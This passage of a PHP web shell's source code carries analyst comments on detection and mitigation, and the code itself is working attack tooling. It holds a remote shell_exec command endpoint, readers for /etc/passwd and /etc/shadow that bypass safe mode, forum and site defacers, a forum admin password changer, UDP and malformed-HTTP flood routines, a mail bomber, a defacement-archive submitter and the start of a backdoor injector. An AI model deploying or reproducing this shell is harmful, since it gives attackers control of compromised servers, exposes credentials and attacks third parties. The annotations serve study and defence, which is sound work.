2546 <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,all.value,f5.value)" class="but" value = "Hack It">
2547 </td>
2548 </tr>
2549 </table>
2550 </form>
2551 </center>
2552 <?php
2553 }
2554 else if(isset($_GET["passwordchange"]))
2555 {
2556 echo "<center>";
2557 ?>
2558 <div id="showchangepass"></div>
2559 <font color="#FF0000" size="4">Forum Password Changer</font>
2560 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value);return false;">
2561 <table border = "1" width="60%" height="246" style="text-align: center;border-color:#333333;" align="center">
2562 <tr>
2563 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"> <b> DataBase :</b> <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> <b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> <b>Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2564 <tr>
2565 <td height="50" width="50%">Type :
2566 <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
2567 <option value="vb">vbulletin</option>
2568 <option value="mybb">Mybb</option>
2569 <option value="smf">SMF</option>
2570 <option value="ipb">IPB</option>
2571 <option value="phpbb">PHPBB</option>
2572 <option value="wp">Wordpress</option>
2573 <option value="joomla">Joomla</option>
2574 </select></td>
2575 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
2576 </tr>
2577 <tr>
2578 <td colspan=2 height="100" width="780">
2579
2580 <p align="center"><div id="fid" style="display:block;"><b>User ID :</b> <input class="sbox" type="text" name="ipbuid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
2581
2582 <div id="joomla" style="display:none;"><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> <b>New Password :</b> <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
2583
2584 <div id="wpress" style="display:none;"><p><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"></div>
2585
2586 <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
2587 </tr>
2588 </table>
2589 </form>
2590 </center>
2591 <?php
2592}
// Analyst note: UDP flood handler of this web shell.
// Runs when the request carries `dosser` plus non-empty `ip`, `port`, `exTime`
// and `timeout`; `no0fBytes` is read without an isset() guard.
// The payload is `no0fBytes` "X" characters followed by the fixed marker
// " Dhanush"; one UDP socket is opened, written and closed per iteration until
// `exTime` seconds have passed.
// Detection: these parameter names in the query string of web access logs;
// sustained outbound UDP from the PHP worker; datagrams ending in " Dhanush".
// Mitigation: block outbound UDP from the web tier and list fsockopen in
// disable_functions. The prologue of this file calls set_time_limit(0), so a
// process-manager limit (e.g. PHP-FPM request_terminate_timeout) is what would
// bound the runtime -- confirm against the deployed SAPI.
else if(isset($_GET['dosser']))
{
    if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
    $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
    {
        $IP=$_GET['ip'];
        $port=$_GET['port'];
        $executionTime = $_GET['exTime'];
        $no0fBytes = $_GET['no0fBytes'];
        $data = "";
        $timeout = $_GET['timeout'];
        $packets = 0;
        $counter = $no0fBytes;
        // Wall-clock deadline; the send loop below only stops once it is reached.
        $maxTime = time() + $executionTime;;
        while($counter--)
        {
            $data .= "X";
        }
        // Constant trailer appended to every datagram (usable as a network signature).
        $data .= " Dhanush";

        while(1)
        {
            $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
            if($socket)
            {
                fwrite($socket , $data);
                fclose($socket);
                $packets++;
            }
            if(time() >= $maxTime)
            {
                break;
            }
        }
        // Summary returned to the operator; HumanReadableFilesize() is defined outside this excerpt.
        echo "Dos Completed!<br>";
        echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
        echo "Total Number of Packets Sent : " . $packets . "<br />";
        echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
        echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
    }
}
// Analyst note: malformed-HTTP-request sender.
// Runs when the request carries `fuzzer` plus non-empty `ip`, `port`, `timeout`,
// `exTime`, `no0fBytes` and `multiplier`.
// Each request is "GET /" + the URL-encoded `no0fBytes` value repeated
// `multiplier` times + a run of printf-style specifiers + "by-Dhanush" +
// " HTTP/1.1" terminated with "\n\r" pairs instead of CRLF.
// `$mode` is "tcp" on every path through this branch, so only TCP connections
// are opened here.
// Detection on the receiving host: request lines containing
// "%s%s%s%s%d%x%c%n%n%n%n" and "by-Dhanush". On the compromised host: the
// parameter names above in access logs and bursts of short-lived outbound
// TCP connections from the PHP worker.
else if(isset($_GET['fuzzer']))
{
    if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
    {
        $IP=$_GET['ip'];
        $port=$_GET['port'];
        // Here `exTime` is a repeat count, not a duration (see the for loop below).
        $times = $_GET['exTime'];
        $timeout = $_GET['timeout'];
        $send = 0;
        $ending = "";
        $multiplier = $_GET['multiplier'];
        $data = "";
        $mode="tcp";
        $data .= "GET /";
        $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
        if($_GET['type'] == "tcp")
        {
            $mode = "tcp";
        }

        while($multiplier--)
        {
            $data .= urlencode($_GET['no0fBytes']);
        }
        $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
        $data .= "by-Dhanush".$ending;
        $length = strlen($data);


        // The assembled request is echoed back to the operator without HTML escaping.
        echo "Sending Data :- <br /> <p align='center'>$data</p>";

        for($i=0;$i<$times;$i++)
        {
            $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
            if($socket)
            {
                fwrite($socket , $data , $length );
                fclose($socket);
            }
        }
        // The reported packet count is the loop bound, not the number of successful writes.
        echo "Fuzzing Completed!<br>";
        echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
        echo "Total Number of Packets Sent : " . $times . "<br />";
        echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
        echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
    }
}
// Analyst note: file-disclosure dispatcher (labelled "Safe mode bypass" in the
// shell's UI). Selected by `bypassit`; a second GET parameter picks the
// primitive used to read a file the PHP configuration would otherwise restrict.
// The mysql_* calls and each() date this sample to PHP 5.x hosts (the mysql
// extension was removed in PHP 7.0, each() in PHP 8.0).
// Hardening that covers most sub-branches: open_basedir, a disable_functions
// list that includes the process-execution and posix_* functions, a web-server
// account with no write access to the document root, and file-integrity
// monitoring for the artefacts called out below.
else if(isset($_GET['bypassit']))
{
    // `copy`: copies the requested path to "test1.php" in the current directory,
    // prints it HTML-escaped, then deletes the copy.
    // Artefact: a short-lived test1.php beside the shell.
    if(isset($_GET['copy']))
    {
        if(@copy($_GET['copy'],"test1.php"))
        {
            $fh=fopen("test1.php",'r');
            echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea></br></br>";
            @fclose($fh);
            unlink("test1.php");
        }
    }
    // `imap`: passes the request value to imap_open() as the mailbox argument.
    // The body is read into $str, which the visible code never prints.
    else if(isset($_GET['imap']))
    {
        $string = $_GET['imap'];
        echo "<textarea cols=120 rows=20 class=box readonly>";
        $stream = imap_open($string, "", "");
        $str = imap_body($stream, 1);
        echo "</textarea>";
    }
    // `sql`: reads the file through MySQL's LOAD DATA LOCAL INFILE into a
    // temporary table and prints the first row.
    // $mdb, $mhost, $muser and $mpass are not assigned in this excerpt --
    // presumably set elsewhere in the file; $mysql_files is built but not used here.
    // Mitigation: turn off local infile on both sides (mysql.allow_local_infile /
    // mysqli.allow_local_infile in php.ini, local_infile on the MySQL server).
    else if(isset($_GET['sql']))
    {
        echo "<textarea cols=120 rows=20 class=box readonly>";
        $file=$_GET['sql'];

        $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
        $mysql_files = explode(':', $mysql_files_str);

        $sql = array (
            "USE $mdb",
            'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
            "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
            . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
            . "ESCAPED BY '' "
            . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

            "SELECT a FROM $tbl LIMIT 1"
        );
        mysql_connect ($mhost, $muser, $mpass);

        foreach ($sql as $statement) {
            $q = mysql_query ($statement);

            if ($q == false) die (
                "FAILED: " . $statement . "\n" .
                "REASON: " . mysql_error () . "\n"
            );

            if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

            echo htmlspecialchars($r[0]);
            mysql_free_result ($q);
        }
        echo "</textarea>";
    }
    // `curl`: requests a file:// URL built from the request value and prints
    // the response HTML-escaped.
    else if(isset($_GET['curl']))
    {
        $ch=curl_init("file://" . $_GET[curl]);
        curl_setopt($ch,CURLOPT_HEADERS,0);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        $file_out=curl_exec($ch);
        curl_close($ch);
        echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
    }
    // `include`: include()s the requested path, so any PHP inside the target is
    // executed rather than only displayed; the "Can't Read" message echoes the
    // parameter unescaped.
    else if(isset($_GET['include']))
    {
        if(file_exists($_GET['include']))
        {
            echo "<textarea cols=120 rows=20 class=box readonly>";
            @include($_GET['include']);
            echo "</textarea>";
        }
        else
            echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
    }
    // `id`: rebuilds a passwd-style listing by calling posix_getpwuid() for
    // UIDs 0..59999; the request value itself is not used.
    else if(isset($_GET['id']))
    {
        echo "<textarea cols=120 rows=20 class=box readonly>";
        for($uid=0;$uid<60000;$uid++)
        { //cat /etc/passwd
            $ara = posix_getpwuid($uid);
            if (!empty($ara))
            {
                while (list ($key, $val) = each($ara))
                {
                    print "$val:";
                }
                print "\n";
            }
        }
        echo "</textarea>";
        break;
    }
    // `tempnam`: creates a temp file whose name prefix is the request value,
    // then prints that file's contents.
    else if(isset($_GET['tempnam']))
    {
        $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
        $fp = fopen ( $mytmp, 'r' );
        while(!feof($fp))
            echo fgets($fp);
        fclose ( $fp );
    }
    // `symlnk`: creates a world-writable directory "mydhanush", links
    // /etc/passwd into it through execmd() (defined outside this excerpt) and
    // fetches the link over HTTP from the request's own Host header.
    // Artefacts: the mydhanush directory under the web root and a request for
    // /mydhanush/passwd originating from the server itself.
    // Mitigation: do not let the web server follow symlinks that leave the
    // document root (e.g. Apache SymLinksIfOwnerMatch).
    else if(isset($_GET['symlnk']))
    {
        echo "<textarea cols=120 rows=20 class=box readonly>";
        @mkdir("mydhanush",0777);
        @chdir("mydhanush");
        execmd("ln -s /etc/passwd");

        echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/mydhanush/passwd");
        echo "</textarea>";
    }
    // `newtype`: a separate `if`, not part of the chain above. The request value
    // is concatenated unescaped onto xxd/rev/tac/more/less and handed to execmd().
    // Detection: these utilities appearing as child processes of the web server
    // or PHP worker.
    if(isset($_GET['newtype']))
    {
        $filename = $_GET['newtype'];
        echo "<textarea cols=120 rows=20 class=box readonly>";
        if($_GET['optiontype'] == "xxd")
            echo execmd("xxd ".$filename);
        else if($_GET['optiontype'] == "rev")
            echo execmd("rev ".$filename);
        if($_GET['optiontype'] == "tac")
            echo execmd("tac ".$filename);
        if($_GET['optiontype'] == "more")
            echo execmd("more ".$filename);
        if($_GET['optiontype'] == "less")
            echo execmd("less ".$filename);
        echo "</textarea>";
    }
}
// Deface Website
// Analyst note: truncates and overwrites the path given in `deface` with the
// decoded contents of $ind (a base64 string assigned at the top of the file).
// The fopen() result is not checked before fwrite().
// Detection: file-integrity monitoring on index/landing pages; the target path
// appears in the query string of the access log.
// Mitigation: the web-server account should not be able to write to served content.
else if(isset($_GET['deface']))
{
    $myfile = fopen($_GET['deface'],'w');
    if(fwrite($myfile, base64_decode($ind)))
    {fclose($myfile);
    echo "Index Defaced Successfully";}
    else
        echo "Donot have write permission";
}
2819else if(isset($_GET['perms']))
2820{
2821?>
2822 <form>
2823 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
2824 <table align="center" border="1" style="width:40%;border-color:#333333;">
2825 <tr>
2826 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
2827 </tr>
2828 <tr>
2829 <td colspan="2" align="center" style="height:60px">
2830 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
2831 </tr>
2832 </table>
2833
2834 </form>
2835 <?php
2836}
// Analyst note: permission changer. Interprets the digits of `chmode` as an
// octal number and applies it with chmod() to the path in `myfilename`.
// Detection: unexpected mode changes on files owned by the web-server account
// (audit the chmod/fchmodat syscalls, or compare against a file-integrity baseline).
else if(isset($_GET["chmode"]))
{
    if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
    {
        $perms = 0;
        // Right-to-left positional sum: each digit times 8^position.
        for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
            $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
        if(@chmod($_GET['myfilename'],$perms))
            echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
        else
            echo "<center><blink>Cannot Change File Permissions</blink></center>";
    }
}
2850else if(isset($_GET['rename']))
2851{
2852?>
2853 <form>
2854 <table border="0" cellpadding="3" cellspacing="3">
2855 <tr>
2856 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
2857 </tr>
2858 <tr>
2859 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
2860 </tr>
2861 <tr>
2862 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/></td>
2863 </tr>
2864 </table>
2865 </form>
2866 <?php
2867
2868}
// Analyst note: renames (or moves) `file` to `to`; both values come straight
// from the query string with no path restriction.
// Detection: both paths are visible in the access log; renames of served files
// show up in file-integrity monitoring.
else if(isset($_GET['renamemyfile']))
{
    if(isset($_GET['to']) && isset($_GET['file']))
    {
        if(!rename($_GET['file'], $_GET['to']))
            echo "Cannot Rename File";
        else
            echo "<font class=txt>File Renamed Successfully</font>";

    }
}
2880else if(isset($_GET['open']))
2881{
2882 if(is_file($_GET['myfilepath']))
2883 {
2884 $owner = "0/0";
2885 if($os == "Linux")
2886 $owner = getOGid($_GET['myfilepath']);
2887 ?>
2888 <form>
2889 <table style="width:57%;">
2890 <tr align="left">
2891 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
2892 </tr>
2893 <tr>
2894 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
2895 </tr>
2896 </table>
2897 <textarea name="content" rows="15" cols="100" class="box"><?php
2898 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
2899 if($content)
2900 {
2901 echo $content;
2902 }
2903 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
2904 {
2905 if(filesize($_GET['myfilepath']) != 0 )
2906 {
2907 fopen($_GET['myfilepath']);
2908 while(!feof())
2909 {
2910 echo htmlspecialchars(fgets($_GET['myfilepath']));
2911 }
2912 }
2913 }
2914
2915 ?>
2916 </textarea><br />
2917 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
2918 </form>
2919 <?php
2920 }
2921 else
2922 echo "File does not exist !!!!";
2923}
// Analyst note: file editor back end. Overwrites an existing file named in
// POST `file` with POST `content`; it refuses only when the file does not exist.
// The handle is never closed in the visible code.
// Detection: POST bodies are normally absent from access logs, so rely on
// file-integrity monitoring and modification times of served files, or on
// request-body inspection at a WAF or reverse proxy.
else if(isset($_POST['file']) && isset($_POST['content']))
{
    if(file_exists($_POST['file']))
    {
        $handle = fopen($_POST['file'],"w");
        if(fwrite($handle,$_POST['content']))
            echo "<font class=txt>File Saved Successfully!</font>";
        else
            echo "Cannot Write into File";
    }
    else
    {
        echo "File Name Specified does not exists!";
    }
}
// Analyst note: defacement-archive submitter. Reads POST `defacer`, `hackmode`,
// `reason` and `domain` (a newline-separated site list), then submits each site
// to http://zone-h.org/notify/single through cURL.
// Detection: outbound HTTP from a web server to zone-h.org in proxy, DNS or
// firewall logs -- a production web tier rarely has a reason to contact it.
// Mitigation: restrict web-tier egress to an allowlist.
else if(isset($_POST["SendNowToZoneH"]))
{
    $hacker = $_POST['defacer'];
    $method = $_POST['hackmode'];
    $neden = $_POST['reason'];
    $site = $_POST['domain'];

    // Form validation: each failure aborts the whole script via die().
    if (empty($hacker))
    {
        die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
    }
    elseif($method == "--------SELECT--------")
    {
        die("<center><font size=3>[-] You Must Select The Method !</center>");
    }
    elseif($neden == "--------SELECT--------")
    {
        die("<center><font size=3>[-] You Must Select The Reason</center>");
    }
    elseif(empty($site))
    {
        die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
    }
    // Zone-h Poster
    // Sends one POST to $url with the fields defacer, domain1, hackmode and
    // reason, follows redirects, and returns whatever curl_exec() returns.
    // Declared inside this branch, so it exists only once the branch has run.
    function ZoneH($url, $hacker, $hackmode,$reson, $site )
    {
        $k = curl_init();
        curl_setopt($k, CURLOPT_URL, $url);
        curl_setopt($k,CURLOPT_POST,true);
        curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
        curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
        $kubra = curl_exec($k);
        curl_close($k);
        return $kubra;
    }

    $i = 0;
    $sites = explode("\n", $site);
    echo "<pre class=ml1 style='margin-top:5px'>";
    while($i < count($sites))
    {
        // Entries that do not start with "http" get an "http://" prefix.
        if(substr($sites[$i], 0, 4) != "http")
        {
            $sites[$i] = "http://".$sites[$i];
        }
        // The return value is discarded: "Posted !" is printed whether or not the request succeeded.
        ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
        echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
        ++$i;
    }

    echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
}
// Analyst note: command-execution endpoint. Changes directory to `executepath`
// and passes `executemycmd` unmodified to shell_exec(), echoing the output.
// Detection: both values travel in the query string, so the command text is
// recorded in access logs; shell processes spawned by the web server or PHP
// worker are visible to process auditing (auditd, EDR).
// Mitigation: list shell_exec and the other process-execution functions in
// disable_functions. NOTE(review): the shell also calls an execmd() helper
// defined outside this excerpt, which may try other functions -- verify.
else if(isset($_GET['executemycmd']))
{
    $comm = $_GET['executemycmd'];
    chdir($_GET['executepath']);
    echo shell_exec($comm);
}
// View Passwd file
// Analyst note: displays /etc/passwd. It shows the file's owner, group, size
// and permissions, then copies the file through the compress.zlib:// stream
// wrapper into a temp file created with prefix "cx", prints it HTML-escaped
// and deletes the temp file.
// Artefact: short-lived files whose names start with "cx". tempnam() is given
// an empty directory, so these presumably land in the system temp directory --
// confirm on the host.
// If the copy fails, a form with fields `etcpasswd`, `val1` and `val2` is
// rendered; its handler is not part of this excerpt.
else if(isset($_GET['passwd']))
{
    $test='';
    $tempp= tempnam($test, "cx");
    $get = "/etc/passwd";
    $name=@posix_getpwuid(@fileowner($get));
    $group=@posix_getgrgid(@filegroup($get));
    $owner = $name['name']. " / ". $group['name'];
    ?>
    <table style="width:57%;">
    <tr>
    <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
    </tr>
    <tr>
    <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
    </tr>
    </table>
    <?php
    if(copy("compress.zlib://".$get, $tempp))
    {
        $fopenzo = fopen($tempp, "r");
        $freadz = fread($fopenzo, filesize($tempp));
        fclose($fopenzo);
        $source = htmlspecialchars($freadz);
        echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
        unlink($tempp);
    }
    else
    {
        ?>
        <form>
        <input type="hidden" name="etcpasswd">
        <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
        <tr>
        <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
        </tr>
        <tr>
        <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
        </tr>
        <tr>
        <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
        </tr>
        </table><br>
        </form>
        <?php
    }
}
// Analyst note: the same compress.zlib:// copy technique, aimed at /etc/shadow.
// On a correctly configured host that file is readable only by root (and
// possibly a shadow group), so a successful read here means the PHP worker runs
// with more privilege than a web process should have. Treat the stored password
// hashes as exposed and rotate credentials.
// The visible code prints nothing when the copy fails.
else if(isset($_GET['shadow']))
{
    $test='';
    $tempp= tempnam($test, "cx");
    $get = "/etc/shadow";
    if(copy("compress.zlib://".$get, $tempp))
    {
        $fopenzo = fopen($tempp, "r");
        $freadz = fread($fopenzo, filesize($tempp));
        fclose($fopenzo);
        $source = htmlspecialchars($freadz);
        echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
        unlink($tempp);
    }
}
3061else if(isset($_GET['bomb']))
3062{
3063 ?><div id="showmail"></div>
3064 <form>
3065 <table id="margins" style="width:100%;">
3066 <tr>
3067 <td style="width:30%;">To</td>
3068 <td>
3069 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
3070 </td>
3071 </tr>
3072 <tr>
3073 <td style="width:30%;">Subject</td>
3074 <td>
3075 <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
3076 </td>
3077 </tr>
3078 <tr>
3079 <td style="width:30%;">No. of Times</td>
3080 <td>
3081 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
3082 </td>
3083 </tr>
3084 <tr>
3085 <td style="width:30%;">Pad your message (Less spam detection)</td>
3086 <td><input type="checkbox" name="padding"/></td>
3087 </tr>
3088 <tr>
3089 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
3090 </tr>
3091 <tr>
3092 <td rowspan="2">
3093 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
3094 </td>
3095 </tr>
3096 </table>
3097 </form>
3098 <?php
3099}
3100
3101//Mass Mailer
3102else if(isset($_GET['mail']))
3103{
3104 ?><div id="showmail"></div>
3105 <div align="left">
3106 <form>
3107 <table align="left" style="width:100%;">
3108 <tr>
3109 <td style="width:10%;">From</td>
3110 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'president@whitehouse.gov')this.value = '';" onBlur="if(this.value=='')this.value='president@whitehouse.gov';"/></td>
3111 </tr>
3112
3113 <tr>
3114 <td style="width:20%;">To</td>
3115 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
3116 </tr>
3117
3118 <tr>
3119 <td style="width:20%;">Subject</td>
3120 <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
3121 </tr>
3122
3123
3124 <tr>
3125 <td colspan="2">
3126 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!!</textarea>
3127 </td>
3128 </tr>
3129
3130
3131 <tr>
3132 <td rowspan="2">
3133 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
3134 </td>
3135 </tr>
3136 </table>
3137 </form></div>
3138 <?php
3139}
3140// Get Domains
3141else if(isset($_REQUEST["symlinkserver"]))
3142{
3143 ?>
3144 <center><table><tr>
3145 <td><a href=javascript:void(0) onClick="getdata('domains')"><font class=txt><b>| Get Domains |</b></font></a></td>
3146 <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
3147 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
3148 <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
3149 </tr></table></center><br>
3150 <div id="showdata"></div><?php
3151}
3152// Forum Manager
3153else if(isset($_REQUEST["forum"]))
3154{ ?>
3155 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
3156 <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
3157 </tr></table></center><br><div id="showdata"></div>
3158 <?php
3159}
3160// Sec info
3161else if(isset($_GET['secinfo']))
3162{ ?><div id=showdata></div>
3163<center><div id="showmydata"></div>
3164</center>
3165<br><center><font color =red size=5>Server security information</font><br><br></center>
3166 <table style="width:100%;border-color:#333333;" border="1">
3167 <tr>
3168 <td style="width:7%;">Curl</td>
3169 <td style="width:7%;">Oracle</td>
3170 <td style="width:7%;">MySQL</td>
3171 <td style="width:7%;">MSSQL</td>
3172 <td style="width:7%;">PostgreSQL</td>
3173 <td style="width:12%;">Open Base Directory</td>
3174 <td style="width:10%;">Safe_Exec_Dir</td>
3175 <td style="width:7%;">PHP Version</td>
3176 <td style="width:7%;">Magic Quotes</td>
3177 <td style="width:7%;">Server Admin</td>
3178 </tr>
3179 <tr>
3180 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
3181 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
3182 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
3183 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
3184 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
3185 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
3186 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} ?></font></td>
3187 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
3188 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
3189 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
3190 </tr>
3191</table><br> <?php
3192 mysecinfo();
3193}
3194// Code Injector
3195
3196else if(isset($_GET['injector']))
3197{
3198 ?>
3199 <form method='POST'>
3200 <table id="margins">
3201 <tr>
3202 <td width="100" class="title">
3203 Directory
3204 </td>
3205 <td>
3206 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
3207 </td>
3208
3209 </tr>
3210 <tr>
3211 <td class="title">
3212 Mode
3213 </td>
3214 <td>
3215 <select style="width: 400px;" name="mode" class="box">
3216 <option value="Apender">Apender</option>
3217 <option value="Overwriter">Overwriter</option>
3218 </select>
3219 </td>
3220 </tr>
3221 <tr>
3222 <td class="title">
3223 File Type
3224 </td>
3225 <td>
3226 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
3227 </td>
3228 </tr>
3229 <tr>
3230 <td>Create A backdoor by injecting this code in every php file of current directory</td>
3231 </tr>
3232
3233 <tr>
3234 <td colspan="2">
